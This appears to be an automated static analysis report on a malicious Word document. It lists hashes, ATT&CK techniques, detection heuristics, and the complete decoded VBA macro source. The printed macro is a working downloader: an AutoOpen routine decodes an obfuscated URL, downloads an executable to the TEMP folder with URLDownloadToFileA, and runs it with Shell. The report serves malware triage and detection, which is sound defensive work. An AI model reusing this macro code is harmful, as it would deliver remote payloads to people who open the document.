Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b400baf11a2a402f…

MALICIOUS

Office (OLE)

Size: 44.5 KB
Created: 2015-01-29 11:53:00
Authoring application: Microsoft Office Word
First seen: 2015-03-15
MD5: 810d89cb8b63077d53e5c37edf026211
SHA-1: 2f1902a478232887eb36e78b9d9b6565720c4949
SHA-256: b400baf11a2a402f8ac05d1ecb99e81bbedebea859aae6918b16eaba8feff296
Risk Score: 278

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1059 Command and Scripting Interpreter

The sample contains VBA macros with an autoopen subroutine, a common technique for executing malicious code as soon as the document is opened. The macro code declares the URLDownloadToFileA API from urlmon to download a second-stage payload from a remote location, and then executes the downloaded file with the Shell function. This indicates downloader or dropper functionality.

Heuristics (9)

  • Reference to URLDownloadToFile API [critical, SC_STR_URLDOWNLOAD]
  • VBA macros detected [medium, OLE_VBA_MACROS, 5 related findings]
    Document contains VBA macro code
  • Potential Shell call in VBA [critical, OLE_VBA_SHELL]
    Matched line in script:
    fTb_A = Shell(o04C, 1)
  • URLDownloadToFile in VBA [critical, OLE_VBA_DOWNLOAD]
    Matched line in script:
        "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low, OLE_VBA_AUTOOPEN]
    Matched line in script:
    Sub autoopen()
  • Environ() call (env variable access) [low, OLE_VBA_ENVIRON]
    Matched line in script:
    E1MwLaU707 VQuwdjCKzfbbafP("h t@tPp<:y/o/pdmawtZag.ug1mdscl‚lnpt.dc0ogm?/;j|sf/)b{iin„.4evxve]"), Environ(VQuwdjCKzfbbafP("TPMnPI")) & VQuwdjCKzfbbafP("\U3z2%4u2N3E5F2C3L5/.†e0xje:")
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4120 bytes
SHA-256: bffae6aaf9b7161ea59c4cf2cf67279a8c20018437155c22df404a01bcbf1e99
Detection
ClamAV: No threats found
Obfuscation or payload: likely
44 of 86 identifiers look randomly generated (e.g. 'nqtlJnRBxmGxoBL') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
eE5Ueh5
End Sub

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Function PvEED()

End Function
Public Function tYlkADG()

End Function
Private Sub fOxzTwB()

End Sub
Private Function HvhIfeFnE()

End Function
Private Function uGASPmHgZUgxMi()

End Function
Public Sub xbdIdjqgLUV()

End Sub
Public Function CJoBAQTQO()

End Function
Private Sub gNPkMRfcK()

End Sub

Attribute VB_Name = "ААвыаыва"
#If VBA7 Then
    Private Declare PtrSafe Function dfsdfsdfsdf Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
    ByVal sdfsdFFdsf As String, _
    ByVal sdfsdFFdsff As String, _
    ByVal sdfsdFFdsffd As Long, _
    ByVal sdfsdFFdsffds As LongPtr) As LongPtr
#Else
    Private Declare Function dfsdfsdfsdf Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
    ByVal sdfsdFFdsf As String, _
    ByVal sdfsdFFdsff As String, _
    ByVal sdfsdFFdsffd As Long, _
    ByVal sdfsdFFdsffds As Long) As Long
#End If

Function E1MwLaU707(BcbMtG1 As String, o04C As String) As Boolean
vJHKBJdfkgfg = dfsdfsdfsdf(0&, BcbMtG1, o04C, 0&, 0&)
fTb_A = Shell(o04C, 1)
End Function


Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub xMiUfC()

End Sub
Private Sub Idjqg()

End Sub
Public Sub TZwCJoBAQTQOoCv()

End Sub
Public Sub kMRfcKYxxZhuV()

End Sub
Public Function KlLQQjRpY()

End Function
Private Sub wNdkmvS()

End Sub
Public Sub agzHwcYYQ()

End Sub
Public Sub arRQhQaRqTyweS()

End Sub
Private Sub isbbNNpyKmGlJc()

End Sub
Private Sub SliFpzFBNefACLj()

End Sub
Private Function qwPYMsoonsdV()

End Function
Private Sub TknqiGOyujDuk()

End Sub
Private Sub reQsObpQ()

End Sub
Private Function EspjBy()

End Function
Private Function VRehvQScmhKasM()

End Function

Attribute VB_Name = "Module2"

Public Function VQuwdjCKzfbbafP(nqtlJnRBxmGxoBL As String) As String
For uiTvResardhH = 1 To Len(nqtlJnRBxmGxoBL) Step 2
VQuwdjCKzfbbafP = VQuwdjCKzfbbafP & Mid(nqtlJnRBxmGxoBL, uiTvResardhH, 1)
Next
End Function

Attribute VB_Name = "Module3"



Attribute VB_Name = "Module4"
Public Sub YjplwNdk()

End Sub
Public Function NrtagzHwcYYQbM()

End Function
Private Sub RQhQaRqT()

End Sub
Public Function SndTi()

End Function
Private Sub NNpyK()

End Sub
Private Sub JcncZSl()

End Sub
Public Function zFBNefAC()

End Function
Private Function tJqwPYMsoonsdV()

End Function
Private Sub TknqiG()

End Sub
Public Sub ujDukyIrre()

End Sub
Private Function bpQoaeEspjByV()

End Function
Private Function RehvQScmhKasMga()

End Function
Private Function EDItmtYlkAD()

End Function
Private Function mfOxzTwBOZuHvhI()

End Function
Sub eE5Ueh5()
E1MwLaU707 VQuwdjCKzfbbafP("h t@tPp<:y/o/pdmawtZag.ug1mdscl‚lnpt.dc0ogm?/;j|sf/)b{iin„.4evxve]"), Environ(VQuwdjCKzfbbafP("TPMnPI")) & VQuwdjCKzfbbafP("\U3z2%4u2N3E5F2C3L5/.†e0xje:")
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{54A06494-5A19-4897-8C03-D61544295ECA}{C251611E-0394-489A-9056-F3CBA9B75179}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False